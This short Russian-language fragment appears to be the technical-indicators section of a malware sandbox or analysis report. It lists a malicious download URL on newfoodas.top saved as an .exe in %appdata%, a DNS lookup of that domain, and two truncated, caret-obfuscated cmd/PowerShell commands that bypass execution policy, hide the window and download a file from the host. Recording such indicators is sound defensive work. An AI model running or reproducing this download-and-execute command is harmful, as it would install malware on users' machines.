Техническая информация
- http://newfoodas.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^O^WErSHelL.^e^xe ^-^EXEc^UT^i^onPoliC^y BYpA^S^s -NO^P^RoFI^Le^ -^WIN^d^oWST^y^Le hi^d^De^n (^N^Ew-^oBJ^E^cT ^SysTE^M^.n^e^T^.WeBcli^enT^).^DO^wNlOAd^F^i^lE('http://newfood...
- DNS ASK ne###odas.top
- '<SYSTEM32>\cmd.exe' /C "p^O^WErSHelL.^e^xe ^-^EXEc^UT^i^onPoliC^y BYpA^S^s -NO^P^RoFI^Le^ -^WIN^d^oWST^y^Le hi^d^De^n (^N^Ew-^oBJ^E^cT ^SysTE^M^.n^e^T^.WeBcli^enT^).^DO^wNlOAd^F^i^lE('http://newfood...' (со скрытым окном)